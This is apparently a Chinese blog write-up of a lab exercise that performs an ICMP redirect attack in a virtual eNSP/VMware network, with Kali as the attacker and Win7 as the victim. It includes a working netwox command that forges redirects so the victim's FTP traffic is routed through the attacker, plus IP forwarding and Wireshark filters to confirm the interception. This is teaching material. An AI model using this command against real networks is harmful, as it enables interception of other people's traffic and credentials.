ICMP重定向攻击

最新推荐文章于 2024-06-03 11:16:34 发布
最新推荐文章于 2024-06-03 11:16:34 发布
阅读量2.2k 收藏 16
点赞数 3
分类专栏: 网络协议安全 文章标签: 安全 网络 网络协议 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/122051433
版权

实验工具:

ENSP(搭建拓扑)

VM虚拟机(kali、win7)

1.环境配置

ENSP:

1.1 使用设备

1.2 ENSP设备配置

        Kali(v8网卡)

        win7(v1网卡)

        路由器配置

        路由器配置查询

        服务器配置

VM虚拟机:

1.3 VM虚拟机配置(kali、win7)

——具体IP,子网,网关配置方法如ARP欺骗实验一样

目的:让kali、win7可以通过云连入ensp拓扑中

kali配置:

Win7配置:

2.检测

2.1 win7检测

检测命令

ping 192.168.10.10     目的:测试与kali之间的网络连通

ftp 192.168.10.10     目的:测试与服务器之间的配置出错

2.2 kali检测

检测命令

ping 192.168.10.20

目的:测试与win7之间的网络连通(若ping不通可能是win7防火墙未关闭)

3. 开始实验

3.1 查看win7中arp表       目的:和实验抓包做比对

3.2 kali进行IP重定向攻击

命令:netwox 86 -f "host 192.168.10.20" -g "192.168.10.10" -i "192.168.10.254"

被攻击者IP          攻击者(伪装者)IP     被伪装者IP

注:echo 1 > /proc/sys/net/ipv4/ip_forward             开启路由转发功能

       wireshrak       打开抓包工具

3.3 win7远程登陆服务器

命令:ftp 192.168.20.10

3.4 查看抓包工具(wireshark)

wireshark筛选条件

icmp.type==5        筛选出icmp数据且类型为5(重定向)的数据

                上图解释(原理):

                                重定向攻击     源192.168.10.10      目标192.168.10.20

                                伪装为192.168.10.254

wireshark筛选条件

ftp

192.168.10.20(win7 IP地址)     192.168.20.10(服务器IP地址)

*-*-*-*-13-3b(网关MAC地址)   *-*-*-*-91-59(kali MAC地址)

结论:

因为在wireshark抓包工具中可见ftp数据有

源192.168.10.20(win7 IP地址)     目标192.168.20.10(服务器IP地址)

 *-*-*-*-ea-e3(win7 MAC地址)       *-*-*-*-91-59(kali MAC地址)

代表:win7去服务器先发给了kali,所以IP重定向攻击实验成功

xjizhi(GG安全)
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实验一:ICMP定向攻击
chuxuezheerer的博客
10-09 5455
实验原理: ICMP定向信息是路由器向主机提供实时的路由信息,当一个主机收到ICMP定向信息时,它就会根据这个信息来更新自己的路由表。由于缺乏必要的合法性检查,如果一个黑客想要被攻击的主机修改它的路由表,黑客就会发送ICMP定向信息给被攻击的主机,让该主机按照黑客的要求来修改路由表。 在VMware虚拟环境中(Virtual Box不同),.2是充当网关的默认地址(通过route命令可以查看当前的网关和路由信息);所以攻击者可以冒充.2发出定向包,通知受害者修改自己的网关为攻击者指定的gw地址;如果
网络-ICMP协议、Ping命令实现与ICMP攻击
关注网络安全、云原生安全
12-14 5245
简介 ICMP(Internet Control Message Protocol,网际控制报文协议)是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着要的作用。 报文格式 ICMP报文分为两类:一类通知出错原因 ,一类用于诊断查询。 ICMP报文格式 类型:占一字节,标识ICMP报文的类型,从类型值来看ICMP报文可以分为两大类。第一类是取.
使用 Scapy 库编写 ICMP 定向攻击脚本
最新发布
Flag少侠的博客
06-03 7574
ICMP定向攻击ICMP Redirect Attack)是一种网络攻击攻击者通过发送伪造的ICMP定向消息,诱使目标主机更新其路由表,以便将数据包发送到攻击者控制的路由器或其他不可信任的设备上。该攻击利用了ICMP协议的合法功能,但以恶意方式使用,从而劫持或中断目标主机的网络流量。
20222959 2022-2023-2 《网络攻防实践》第四次作业
qq_44823422的博客
03-27 131
通过本次实验,我对ARP欺骗攻击ICMP定向攻击、SYN FLOOD攻击和TCP RST攻击以及TCP会话劫持攻击等网络攻击方式有了一个更深入的了解与掌握,丰富了网络攻防的技能。
eNSP:双向定向和路由策略练习
Zombie_QP的博客
08-11 248
【代码】eNSP:双向定向和路由策略练习。
网络安全ICMP定向攻击
木瓜有益健康的博客
03-28 4918
网络安全——ICMP定向攻击网络命令网络工具——netwox 网络命令 网络不可用 $ ping ${域名} $ ping ${ip地址} $ ifconfig #lo:本地网卡;enss:朝外发包的网卡 $ ifconfig -a #对比上一条结果,查看哪个网卡未开启 $ route #route -n查看本机网络状况 $ netstat -lt #正在监听的tcp端口,-p显示进程号 $...
ARP欺骗及ICMP定向攻击技术研究 (2008年)
05-26
ARP欺骗及ICMP定向攻击是以太网中常用的攻击手段,两者都可达到监听网络或对目标主机进行拒绝服务攻击的效果。该文通过分析两者在实现方式、适用范围方面的不同,得出实施ICMP定向攻击难度更大的结论。根据IP路由原理,反驳了可以跨网段实施 ARP欺骗的观点,指出其无法实现的根本原因在于忽略了目标主机要对接收到的ICMP定向报文进行详细检查,这种攻击手段实际上很难奏效。
flushwifi:一个为OSX编写的简单脚本,用于新启动所有网络接口,清除ARP缓存和刷新路由。 还包括MAC随机化和免受ICMP定向攻击的保护
05-01
还增加了针对ICMP定向攻击的保护,而OSX不会将其存储为永久设置,因此需要在每次启动时运行它: sysctl -w net.inet.icmp.drop_redirect=1需要使用Spoof-mac才能利用MAC欺骗功能。 在这里得到它: ###安装并运行...
ICMP定向
08-06
然而,需要注意的是,ICMP定向报文也可能被用于网络攻击,如中间人攻击或路由劫持。因此,了解并适当配置ICMP定向的行为对于服务器安全至关要。 总的来说,ICMP定向是一种网络优化机制,通过路由器通知主机...
网络技术附加培训内容-ICMP定向介绍
06-08
例如,攻击者可能会通过伪造ICMP定向报文,引导数据包流向攻击者控制的网络,实施中间人攻击。因此,一些网络设备和操作系统默认会限制或禁用ICMP定向,以提高安全性。 **总结** ICMP定向是网络通信中的一种...
icmp-ip 定向.rar
07-25
利用这点可以进行网络攻击和窃听,如果目的主机A支持定向,那么主机B发送一个ICMP定向给它,以后它发送的所有到指定目的报文都转发到B,这样B就可以达到窃听的目的.不过WIN系统,它会对ICMP报文进行检测,如果这个...
ICMP定向介绍,ICMP定向介绍
08-17
ICMP定向介绍ICMP定向介绍ICMP定向介绍
ICMP定向攻击实验:
文武老司机的博客
12-16 3065
ICMP定向攻击实验: 0x01 攻击目的: ​ 使用攻击机对本网段内靶机进行ICMP定向攻击。目的是诱使靶机认为攻击机是网关,将所有流量交给攻击机转发。攻击机即可实现中间人身份。 0x02 环境介绍: ​ 攻击机:Kali linux ​ 靶机:ubuntu 20.04 ​ 存在形式:vmware之虚机 ​ 联网方式:NAT ​ IP地址: ​ Gateway:192.168.8.2/24 ​ Kali linux:192.168.8.128/24 ​
ICMP定向、不可达攻击
Hala
03-18 2590
ICMP定向攻击 ICMP定向: 字面意思是新定义方向,即处于一个网段设备A、B、C,A想要去C,却把报文发给了B,B随即告诉A,你直接去C,不用来我这里 ICMP定向攻击: 伪造者伪装成网关,就可以分配ICMP定向后的方向 实验环境如下: 实验拓扑为: 在攻击之前,要保证PC1与PC2能通 R1 R2运行OSPF协议 测时: PC1-&gt...
网络地址转换NAT
m0_55637617的博客
03-21 249
网络地址转换NAT实现方式工作原理如何配置PAT端口多路复用PAT的基本原理PAT的作用和类型EasyIp和NAT Server 实现方式 实现方式有三种 1.静态转换 2.动态转换 3.端口地址转换 工作原理 NAT用来将内网地址和端口号转换成合法的公网地址和端口号,建立一个会话,与公网主机进行通信 NAT外 部的主机无法主动跟位于NAT内部的主机通信,NAT内部主机想要通信,必须主动和公网的一个IP通信,路由器负责建立一个映射关系,从而实现数据的转发。 如何配置 [R1]nat static globa
网络随堂笔记3(网络层ip及网段细分)
qq_44685426的博客
11-01 1390
HCIA --- 华为认证的初级网络工程师 (目前学习中) HCIP --- 华为认证的高级网络工程师 HCIE --- 华为认证的专家级网络工程师
nagios 部署手册
preamble_1的博客
02-22 7511
nagios 监控实战 监控服务器(nagios服务器--192.168.1.100) Linux 5.3 + nagios-3.2.1 + nagios-plugins-1.4.15 +nrpe-2.12 被监控客户端(linux客户端/windows客户端--192.168.1.200) CentOS5.4 + nagios-plugins-1.4.14 + nrpe-2.12
ICMP 定向
shida's blog
11-06 2125
       当 IP 数据报应该被发送到另一个路由器时,收到数据报的路由器就要发送 ICMP 定向差错报文给 IP 数据报的发送端,定向一般用来让具有很少选路信息的主机逐渐建立更完善的路由表。        工作原理举例:        1.  我们假定主机发送一份 IP 数据报给 R1。这种选路决策经常发生,因为 R1 是该主机的默认路由。 2.  R1 收到数据报并且检查它的路由表,发...
java指定源组播_HCIE学习笔记——组播SM模式下的RP选举与切换
weixin_34254044的博客
12-03 362
PIM-SM--RP选举与切换拓扑R1(config)#int f0/0R1(config-if)#ip address 192.168.10.10 255.255.255.0R1(config-if)#no shutR1(config-if)#ip igmp join-group 239.1.1.1R1(config-if)#ip igmp join-group 239.1.1.2R1(conf...
预防ICMP定向攻击
04-23
ICMP定向攻击是一种利用网络控制协议(ICMP)的攻击方式,攻击者发送虚假的ICMP定向消息来欺骗网络中的主机,导致其流量被定向到攻击者指定的网站或者服务器。为了预防ICMP定向攻击,可以采取以下措施: 1. 禁用ICMP定向功能:在Linux系统中可以通过修改/proc/sys/net/ipv4/conf/all/accept_redirects文件或者在Windows系统中修改注册表来禁用ICMP定向。 2. 使用VPN:通过使用VPN的加密通道来保证数据传输的安全,可以有效的预防ICMP定向攻击。 3. 使用网络防火墙:在网络出入口设置防火墙,过滤伪造的ICMP定向消息,防止其达到网络内部的主机。 4. 使用加密协议:使用HTTPS等加密协议,可以保证数据传输的安全性,有效地防止ICMP定向攻击引起的数据泄露等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值